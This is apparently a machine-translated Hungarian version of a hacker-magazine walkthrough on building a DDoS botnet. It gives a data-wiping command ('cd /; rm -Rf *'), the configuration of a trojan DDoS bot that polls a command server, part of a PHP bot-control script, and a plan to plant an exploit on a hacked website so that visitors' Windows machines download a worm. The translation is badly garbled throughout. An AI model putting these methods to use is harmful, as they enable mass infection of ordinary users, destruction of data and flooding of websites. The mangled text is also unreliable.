Létrehozza a saját DDoS-hadsereg
Mindaz, amit írt DDoS-támadások eddig volt tisztán elméleti. Ma úgy döntöttünk, hogy szüntesse meg a fátyol a titkosság és megmondja, hogy az ilyen támadásokat hajtanak végre a gyakorlatban. Különösen akkor megtaláltuk Chela, aki megtette, ha minden a lépéseket, hogy létrehozzon egy DDoS-hadsereg és tart egy kis támadás egyik weboldalakat.
Ha néha szenved emlékezetkiesés és elfelejtett, amit egy DDoS-támadások, ha jól emlékszem. Mondjuk én már türelmetlenül, hogy egy nagyobb ellensége a kiszolgáló rendszer. Hogyan tudom ezt megtenni? Persze, sok különböző módon, hogy hajtsák végre az ötleteimet. Például, ha tudok törni a szerveren, kap egy gyökér-héj, tudok végezni, és a csapat «cd /; rm -Rf *», amely az összes, a fájlok törlődnek a kredenc, és a számítógép nem fog működni, amely természetes módon. De ez a módszer nem annyira tökéletes - kap shell hozzáférést az abszolút kiváltság nem mindig könnyű. Ezért néha célszerű használni más, univerzális módon. Például, akkor küldjön egy hatalmas mennyiségű szemét forgalmat kiszolgáló teljesen pontozási bejövő csomagokat, az áldozat csatornát. Ennek eredményeként, megtámadta a számítógép csak lefagy, amíg ütközésig árvíz. Természetesen a végrehajtásához ezt a technológiát, a teljes kapacitást a csatorna, ahonnan a támadás nagyobbnak kell lennie, mint a csatorna megtámadta autók.
Általában a cél világos: Azt kell, hogy átvegye csatorna, a teljes kapacitás, amely nagyobb vagy legalábbis összehasonlítható az áldozat kapcsolat sebességét. Itt megy két módon. Az első az, ami. Akkor feltörni néhány nagy szerverek, töltse ki, és össze őket speciális szoftvert, amely megvalósítja az egyik árvíz támadás, majd ad nekik egy paranccsal indíthatja DDoS-támadások ellen. Például, FIN / ACK elárasztó a 3APA3'y (security.nnov.ru/files/stream3.c) "Bang" kopogtat szerverek alatt Win2k. De ez nem azt mondják, szünet egy tucat nagy szerverek - egy nehéz, néha lehetetlen feladat. Ez az oka annak, hogy ma megyek a második út: gondoskodjon tömeg protroyanivanie gépek hétköznapi felhasználók csatornák használatával és szerény yuzayuschih operációs rendszer, mint a Windows. Természetesen erre azt zayuzat egyik leggyakoribb hibákat ablakok vagy elcsépelt prospamlyu felhasználók egy speciális, előre elkészített trójai fordulni autóikat kezökbe állatokat. Egyértelmű, hogy a kommunikációs csatornák egy Internet a felhasználók többsége a web sokkal szűkebb, mint a nagy szerverek, tehát, hogy hozzon létre egy erős hadsereg DDoS-bot, meg kell törni néhány ezer felhasználó. A csapat már nagyon is lehetséges, hogy töltse és a nagy zsákmányt. Most megmutatom, hogyan lehet a legjobban, hogy végre ezt a támadást a gyakorlatban. Tochi görkorcsolya, menjünk!
Mielőtt elkezdené DDoS-támadások a Microsoft.com, meg kell, hogy készen áll. Először is, meg kell találni a megfelelő DDoS-Trojan, amit megfertőzi a fertőzött számítógépeken. Tény, hogy találjanak valamit érdemes az interneten - egy halott kacsa, amit nagyon világosan látni néhány óra szörfözés a különböző keresőmotorok, fórumok és a hackelés archívumokat. Egyik állami eszközök nem áll jól nekem, minden tekintetben. Amit követelte DDoS-program? Először is, meg kell értenünk, hogy a szerény méretű bináris futtatható, annál jobb: a trójaiak kell a kis és fürge, ami megkönnyíti telepíteni, és hogy ő nem dobja sok a szemét. Ugyanakkor tulza hatékonyan kell árasztani a sértett elaludt, hogy nem egy gyerek csomag segítségével az egyik a klasszikus DDoS-technológiákat. Az is nagyon fontos, hogy a botok könnyen kezelhető - katonák ezrei a hadsereg legyen mobil és engedelmes. Sajnos, semmi érdemlegeset az interneten, nem találtam, és fokozatosan közel került ahhoz a gondolathoz, hogy szükséges vagy keresni a megszokott valami privát, vagy írni egy új, eredeti eszköz. Én egy ideig próbál tenni: elhagyni a kész eszköz nem siet, hogy megtalálja a megfelelő beállítást, és nehéz lesz a DDoS - könnyebb írni magad. Azonban nem vagyok szakértő rendszer programozás Windows alatt, ezért fordult a Gollam, aki vezetett egy régi barát DDoS-fantasztikus eszköz teljesen alkalmas minden a követelményeknek. Futtatható fájl súlya mindössze 7 kilobájt, így könnyű lesz vparivat. Lehetőségek azonban legalább ESZKÖZÖK: Ez a trójai képes megszervezni ICMP árvíz támadás, hogy végre minden parancsot cmd, és megjeleníti a felhasználó egy szöveges üzenetet MsgBox. Első pillantásra úgy tűnhet, hogy ez nem elég. Sőt, ha elfogjuk ezer számítógépet, lehet, hogy megéri, hogy néhány átgondolt szabályozás talicskák? Azonban a közelebbi vizsgálat kiderül, hogy ez a vonás készlet több mint elég. Valóban, az ftp paranccsal lehet letölteni a merevlemezre bármely más bináris és futtatni könnyen. Tehát, hogy nem lép fel probléma, ha van egy vágy, hogy lépni, és teljes terhelés a lefoglalt autók.
Szóval, miután pár órával azután, hogy bekopogtatott Gollam icq, kaptam egy levelet a forráskódot, és lefordított bináris DDoS-bot. Itt az ideje, hogy tesztelje azt a munkát, és hogy megértsük, legalább felületesen, hogyan működik. Miután egy rövid tanulmányt a források és a program, volt egy elégedett mosollyal az arcomon: ez úgy működik, holtan. A legelején a kód határozza meg számos kulcsfontosságú paraméterek, hogy meg kell változtatni, ha annak ellenére, hogy a figyelmeztetések, szeretné megismételni a tetteimet. De mielőtt felkel a remegő utat, tudom, hogy ez az egész törvénytelen és alá számos cikket a Btk mi nagy nemzet. Ezen felül, akkor tudnia kell, az egész történetet - tiszta fikció rabja hegyezve, és bármilyen egyezés - véletlen egybeesés. Tehát az elején a forráskód a következő sorokat:
A fő paraméterek DDoS-bot
#define WEBADDRESS "ired.inins.ru"
#define WEBFILE "árvíz"
#define packetsize 1000
// Levél csomagráta
#define FREQ 100
Azt fogja mondani néhány szót a különböző lehetőségek. Amint azt már említettük, trójai egyedül azt a parancsot kapja, hogy csatlakozik a web szerver, ami által meghatározott URL WEBADDRESS állandó. Bot kéréseket a szerver nevét a tárolt dokumentum WEBFILE, és az alapján a parancsot kapta ott végez valamilyen műveletet. Mint lehetőség - kezdődik csomag árvíz áldozata hosszú csomagméretet, elküldi őket egy időben az időtartam alatt paraméter által FREQ. Alapértelmezett beállításai az átlagos var kábel csatornák, egy telefonos kapcsolat problémák merülhetnek fel, ezért tanácsos, hogy csökkentsék a hossza a csomagot, és növelje a paraméter FREQ. De ez az eset -. Mint te, remélem, természetesen, mint egy fájlt a feladat nem jár, mint a lírikus, de minden esetben -, mert a web-szerver ad az ügyfél a szöveget a script, és DDoS-bot nem tesz különbséget, amely a munka. Emiatt célszerű a kényelem írni egy egyszerű php-script, hogy ellenőrizzék a botok és statisztikák gyűjtése. Nem leszek az adott szállítási és csak add ide a tartalmát a forgatókönyvet írtam 5 percig:
Script irányítani botok.
if (isset ($ _ GET [sta]))
Echo "";
if (isset ($ _ GET [sub]))
if (fwrite ($ fp, $ _GET [cmd])) echo „Command frissítve!
„
$ Fp = fopen ( "command.db", "R"); / * Nyomtatása formában változó az aktuális parancs * /
echo "
„Így létrehoztunk egy ellenőrző rendszert munkájának botokat és statisztikát. Most van itt az ideje, hogy felkészüljünk az exploit kód zatroyanivaniya felhasználók. Ez nem nehéz, látni fogod, -.
Miután szerkesztette a kívánt kihasználják kód, én választottam az egyik telek törött, és megváltoztatta a főoldalon behelyezésével rosszindulatú kódot. Bár sploit és égetés a munkájukat, a felhasználók nem látják semmi gyanúsat, és továbbra is népszerű juzat erőforrás. Közben visszafordíthatatlan folyamatokat fog bekövetkezni a méhében ablakok: Töltse le és futtassa a féreg, hogy regisztrálja biztonságosan a rendszerben. Az újraindítás után csatlakozik a szerverre, akkor megkapja a parancsot, és kezdjük el végre azt módszeresen. Most már csak várni, amíg zatroyanitsya elég felhasználó. Számításaim szerint, mintegy 20% -a látogatói és a veszélyeztetett böngészők én ügyfelek. Ez nem is olyan kicsi, ha belegondolunk: a nap a helyén volt látogatott mintegy 15.000 felhasználó, kiderül, hogy egy nap a hadsereg hozzá kell adni 3000 harcosok.